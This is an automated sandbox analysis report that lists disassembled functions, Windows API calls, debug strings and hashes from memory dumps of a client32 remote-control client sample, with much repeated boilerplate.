Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageSendTimeoutWindow__wcstoi64_free
String ID: Client$DisableJournalMenu$IsA()$Journal status( bNoMenu = %d, gpJournal = %x, %d, %d) bVistaUI %d$SendJournalStatustoSTUI(%d, %d, %d, %d)$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
API String ID: 1897251511-2352888828
Opcode ID: 4ede6dc84587d8a305999f16e64b7390d9a0d283e67626730db1271a74cc8d60
Instruction ID: 7d7d201ace8770d3ab851aba43ef7aa7a0e05de8b0dcb1a0fb6fb2d6540d47c3
Opcode Fuzzy Hash: 4ede6dc84587d8a305999f16e64b7390d9a0d283e67626730db1271a74cc8d60
Instruction Fuzzy Hash: 37717DB5F0021AAFDB04DFD4CCC0AEEF7B5AF48304F244279E516A7685E631A905CBA1

Function 110CDA20 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 174COMMON

Download Yara Rule

APIs

GetClientRect.USER32(00000000,?), ref: 110CDA7D
BeginDeferWindowPos.USER32(?), ref: 110CDAC8
GetWindowRect.USER32(?,?), ref: 110CDAF3
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 110CDB20

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

NSMDlg::PositionControls(), dlg L=%d, T=%d, W=%d, H=%d, dlgdx=%d, dlgdy=%d, xrefs: 110CDAAE
m_hWnd, xrefs: 110CDA68
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110CDA63

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Rect$BeginClientDeferErrorExitLastMessagePointsProcesswsprintf
String ID: NSMDlg::PositionControls(), dlg L=%d, T=%d, W=%d, H=%d, dlgdx=%d, dlgdy=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1318711716-1344931218
Opcode ID: 1075e9168031a585f74dd6fe8e56c4c09074a7f4fc4a6ff99dc6c00e1430e877
Instruction ID: 6e832200d596028f142909df2e54cb419f2f6b28c47cf9d09cf59c182f23e1b8
Opcode Fuzzy Hash: 1075e9168031a585f74dd6fe8e56c4c09074a7f4fc4a6ff99dc6c00e1430e877
Instruction Fuzzy Hash: D271C3B5D00609AFCB14CFA9D984AAEFBF5FF88714B108659E426A7744C730B851CFA4

Function 1100B870 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 149COMMON

Download Yara Rule

APIs

GetOverlappedResult.KERNEL32(?,B6DE5BA1,FFFFFFFF,00000001), ref: 1100B8BC
GetLastError.KERNEL32 ref: 1100B8C6
GetTickCount.KERNEL32 ref: 1100B929
wsprintfA.USER32 ref: 1100B966
ResetEvent.KERNEL32(?), ref: 1100BA1F

Strings

Hook_channels, xrefs: 1100B9BB
Audio, xrefs: 1100B9C0, 1100B9E0
New hooked channels,bitspersample=%d,%d (old %d,%d), xrefs: 1100B9A4, 1100BA07
Hook_bits_per_sample, xrefs: 1100B9DB

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountErrorEventLastOverlappedResetResultTickwsprintf
String ID: Audio$Hook_bits_per_sample$Hook_channels$New hooked channels,bitspersample=%d,%d (old %d,%d)
API String ID: 3598861413-432254317
Opcode ID: 4d8ccca68772371beae9765a05ae04c1519a56a32be935604de69499ee4f6c87
Instruction ID: 18c60078330076d4e9d4cf7e90cd241f5a56869eb84b7316cdfab9231a576d1f
Opcode Fuzzy Hash: 4d8ccca68772371beae9765a05ae04c1519a56a32be935604de69499ee4f6c87
Instruction Fuzzy Hash: 7351D1B8900A1AABE710CFA5CC84ABBF7F8EF49709F004519F56697281E7747980C7B5

Function 11029520 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 131COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 1102965A
GetTickCount.KERNEL32 ref: 1102968A
GetTickCount.KERNEL32 ref: 110296C8

Strings

DisableStandby, xrefs: 1102959A
Client, xrefs: 1102959F
IgnorePowerResume, xrefs: 110296AC
APMSUSPEND, suspended=%u, suspending=%u, resuming=%u, xrefs: 11029600
_debug, xrefs: 110296B1
Stop resuming, xrefs: 11029617

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick
String ID: APMSUSPEND, suspended=%u, suspending=%u, resuming=%u$Client$DisableStandby$IgnorePowerResume$Stop resuming$_debug
API String ID: 536389180-1339850372
Opcode ID: b0d48e285380544e5a04f23f59acccb283078a85027adb73250184a2610d4c83
Instruction ID: 7a2480a0f38ec62df9d6165c4879ba51ca1346fdc5c877313ede350298642e4b
Opcode Fuzzy Hash: b0d48e285380544e5a04f23f59acccb283078a85027adb73250184a2610d4c83
Instruction Fuzzy Hash: 8541CD75E022359BE712CFE1D981BA9F7E4FB44348F10056AE83597284FB30E680CBA1

Function 111076E0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 123COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 11107715
EnterCriticalSection.KERNEL32 ref: 11107728
GetTickCount.KERNEL32 ref: 1110772E
_strncpy.LIBCMT ref: 111077EB
GetTickCount.KERNEL32 ref: 1110780C
LeaveCriticalSection.KERNEL32(111F160C), ref: 11107815

Strings

Warning. simap lock held for %d ms, xrefs: 11107825
Warning. took %d ms to get simap lock, xrefs: 1110773D
SetTSModeClientName(%d, %s) ret %d, xrefs: 111077FF

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$CriticalSection$EnterLeave_strncpy
String ID: SetTSModeClientName(%d, %s) ret %d$Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
API String ID: 3891031082-3311166593
Opcode ID: e724e7b83d875102122b1b16448b14bdaea8f0febcc2212ee161bb5a17434397
Instruction ID: d3321afa8f45acf833dece3f06e7fdc0391082dc92555cffabcd4bc49ffbb5d2
Opcode Fuzzy Hash: e724e7b83d875102122b1b16448b14bdaea8f0febcc2212ee161bb5a17434397
Instruction Fuzzy Hash: 6641327AE00A19AFE710DFA4C888F9AFBF4FB05358F014269E89597341D774AC40CB90

Function 110DD6D0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 122COMMON

Download Yara Rule

APIs

OutputDebugStringA.KERNEL32(NsAppSystem Info : Unexpected data from NsStudentApp...), ref: 110DD77D
std::exception::exception.LIBCMT ref: 110DD7B8
__CxxThrowException@8.LIBCMT ref: 110DD7D3
OutputDebugStringA.KERNEL32(NsAppSystem Info : Control Channel Closed by 0 bytes RECV...), ref: 110DD841
OutputDebugStringA.KERNEL32(NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********), ref: 110DD875

Part of subcall function 110D7F00: __CxxThrowException@8.LIBCMT ref: 110D7F6A
Part of subcall function 110D7F00: #16.WSOCK32(?,?,?,00000000,00001000,B6DE5DE1,?,00000000,00000001), ref: 110D7F8C

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

Strings

NsAppSystem Info : Control Channel Closed by 0 bytes RECV..., xrefs: 110DD83C
NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********, xrefs: 110DD870
NsAppSystem Info : Unexpected data from NsStudentApp..., xrefs: 110DD775
NsAppSystem Info : Control Channel Waiting For Data..., xrefs: 110DD703

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DebugOutputString$Exception@8Throw$_malloc_memsetstd::exception::exceptionwsprintf
String ID: NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********$NsAppSystem Info : Control Channel Closed by 0 bytes RECV...$NsAppSystem Info : Control Channel Waiting For Data...$NsAppSystem Info : Unexpected data from NsStudentApp...
API String ID: 477284662-4139260718
Opcode ID: dbd2cdf28a0a0cf71f03d3c226c743d460d308e4e4eed45dc5dc12da83a0402e
Instruction ID: 0fb2eb5c845aae8e11df8756a30c5633d39706f88fe6ba16aa3ac9f9913de48b
Opcode Fuzzy Hash: dbd2cdf28a0a0cf71f03d3c226c743d460d308e4e4eed45dc5dc12da83a0402e
Instruction Fuzzy Hash: 85414B78E002589FCB15CFA4C990FAEFBB4FF19708F548199E41AA7241DB35A904CFA1

Function 1103D2B0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 113filewindowCOMMON

Download Yara Rule

APIs

FindWindowA.USER32(NSMW16Class,00000000), ref: 1103D2E4
SendMessageA.USER32(00000000,0000004A,00000000,?), ref: 1103D313
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1103D353
CloseHandle.KERNEL32(?), ref: 1103D364

Strings

NSMW16Class, xrefs: 1103D2DF
CLTCONN.CPP, xrefs: 1103D3BF

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseFileFindHandleMessageSendWindowWrite
String ID: CLTCONN.CPP$NSMW16Class
API String ID: 4104200039-3790257117
Opcode ID: 7bae25e5ec6ac12795ee0301b5ed4f221613fcdb06e7094a7561e2cb570cb440
Instruction ID: 7413f3f2c5586e26beac36a23cabaf74cb1d99cfb277255675335e3274ed5d18
Opcode Fuzzy Hash: 7bae25e5ec6ac12795ee0301b5ed4f221613fcdb06e7094a7561e2cb570cb440
Instruction Fuzzy Hash: AC418E75A0020AAFE715CFA0D884BDEF7ACBB84719F008659F85997240DB74BA54CB91

Function 1113F0E0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 111windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,00000000,00000000), ref: 1113F116
MessageBeep.USER32(00000000), ref: 1113F1C9
InvalidateRect.USER32(?,00000000,00000001,?,?,?,00000000,00000000), ref: 1113F1F4
UpdateWindow.USER32(?), ref: 1113F21B

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

NSMStatsWindow Add value %d, xrefs: 1113F199
m_hWnd, xrefs: 1113F0F9, 1113F1DF, 1113F20A
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1113F0F4, 1113F1DA, 1113F205
NSMStatsWindow Read %d and %d (previous %d), xrefs: 1113F153
NSMStatsWindow::OnTimer, xrefs: 1113F11C

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageWindow$BeepErrorExitInvalidateLastProcessRectUpdatewsprintf
String ID: NSMStatsWindow Read %d and %d (previous %d)$NSMStatsWindow Add value %d$NSMStatsWindow::OnTimer$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 490496107-2775872530
Opcode ID: d9e39ef12bae1f0dabfce1c2349acdb44f901fd7f2055dc060b1669aa1c7fefe
Instruction ID: d3d90aad3bca8c51e092343d299df36488d3ee70d707c240b8c59d5b32e4b979
Opcode Fuzzy Hash: d9e39ef12bae1f0dabfce1c2349acdb44f901fd7f2055dc060b1669aa1c7fefe
Instruction Fuzzy Hash: 1D3114B9A5031ABFD710CB91CC81FAAF3B8AB84718F104529F566A76C4DA70B900CB52

Function 1103DA70 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 98synchronizationCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1103DA9F
GetModuleFileNameA.KERNEL32(00000000,?,00000125), ref: 1103DACD
CloseHandle.KERNEL32(?), ref: 1103DB6C
WaitForSingleObject.KERNEL32(?,000000FF), ref: 1103DB7C
CloseHandle.KERNEL32(?), ref: 1103DB89

Strings

RunAnnot, xrefs: 1103DA87
" /a, xrefs: 1103DAEF
8zi, xrefs: 1103DB2D
/247, xrefs: 1103DB1A

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandle$FileModuleNameObjectSingleWait_memset
String ID: /247$" /a$8zi$RunAnnot
API String ID: 2581068044-4233445462
Opcode ID: 247abbee833aeb5fef7df6dc5c52d513725b01fa2ad4f0c4e56407ffa4650eaf
Instruction ID: 9814aaaf2128a3aaa143c056c421b0bb556d3d2a10abb2bbf927c281709ec8f0
Opcode Fuzzy Hash: 247abbee833aeb5fef7df6dc5c52d513725b01fa2ad4f0c4e56407ffa4650eaf
Instruction Fuzzy Hash: 0C41B231A052299FEB15CFA4CC94FEDB7B9EB49304F1080E5E6589B280DBB1A944CF90

Function 11023470 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetWindowTextLengthA.USER32(?), ref: 11023491
GetDlgItem.USER32(00000000,000013AB), ref: 110234D4
ShowWindow.USER32(00000000), ref: 110234D7
GetDlgItem.USER32(00000000,000013AB), ref: 11023521
ShowWindow.USER32(00000000), ref: 11023524

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

GetDlgItem.USER32(00000000,?), ref: 1102356B
EnableWindow.USER32(00000000,00000000), ref: 11023577

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h, xrefs: 110234B1, 110234FE, 11023554
m_hWnd, xrefs: 110234B6, 11023503, 11023559

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Item$Show$EnableErrorExitLastLengthMessageProcessTextwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
API String ID: 3823882759-1986719024
Opcode ID: 6731b4a21ae5097193c9452f6bf6a924e6ae7ca037130a291c3622393df669cb
Instruction ID: 3a296536204feeda3cf5b5ace87cff4b3db999d64eabd005e2355b496405e70e
Opcode Fuzzy Hash: 6731b4a21ae5097193c9452f6bf6a924e6ae7ca037130a291c3622393df669cb
Instruction Fuzzy Hash: ED214875E04329BFD724CE61CC8AF9EB3A8EB4871CF40C439F62A5A580E674E540CB51

Function 110377F0 Relevance: 15.2, APIs: 10, Instructions: 228COMMON

Download Yara Rule

APIs

GetDlgItemTextA.USER32(?,?,?,00000080), ref: 11037824
SelectObject.GDI32(?,?), ref: 11037872
InflateRect.USER32(?,000000FF,000000FF), ref: 110378C6
GetBkColor.GDI32(?), ref: 11037A5C
InflateRect.USER32(?,000000FF,000000FF), ref: 110378F9

Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 111430F4
Part of subcall function 111430E0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11143109
Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 11143111

InflateRect.USER32(?,000000FF,000000FF), ref: 11037923
GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 11037938
DrawTextA.USER32(?,?,?,?,00000410), ref: 11037AC4
DrawTextA.USER32(?,?,?,?,00000010), ref: 11037B37
SelectObject.GDI32(?,00000000), ref: 11037B49

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
